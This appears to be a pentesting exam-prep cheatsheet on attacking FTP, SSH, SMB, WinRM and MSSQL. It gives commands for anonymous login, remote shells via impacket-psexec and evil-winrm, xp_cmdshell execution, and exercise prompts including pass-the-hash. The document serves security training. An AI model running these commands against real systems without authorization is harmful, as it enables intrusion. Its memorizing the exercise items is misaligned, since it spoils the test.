Attacking Common Services
Exploitation
Overview
Exploit techniques for FTP, SSH, SMB, RDP, SQL, and other services.
Cheatsheet
FTP (21)
ftp 10.10.10.5 # Connect to FTP server
anonymous/anonymous # Try anonymous login
SSH (22)
ssh user@10.10.10.5 # Connect via SSH with password
ssh -i id_rsa user@10.10.10.5 # Connect via SSH with private key
SMB (445)
smbclient //10.10.10.5/share -U user # Connect to SMB share
impacket-psexec user:pass@10.10.10.5 # Get shell via PsExec (needs admin)
WinRM (5985)
evil-winrm -i 10.10.10.5 -u user -p pass # Get shell via WinRM
MSSQL (1433)
impacket-mssqlclient user:pass@10.10.10.5 # Connect to MSSQL
xp_cmdshell 'whoami' # Execute command via xp_cmdshell
Command Examples
Common Pitfalls
- Ignoring non-standard ports
- Not trying default creds
Exam Survival Tips
- Always check for anonymous access
- Look for credential reuse
Exercises
case file
medium
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
445/tcp open ...
fill command
medium
Write the evil-winrm command to connect to 10.10.10.5 as user with password pass123:...
fill command
hard
Write the impacket-psexec command to get a shell as admin with NTLM hash aad3b435b51404eeaad3b435b51...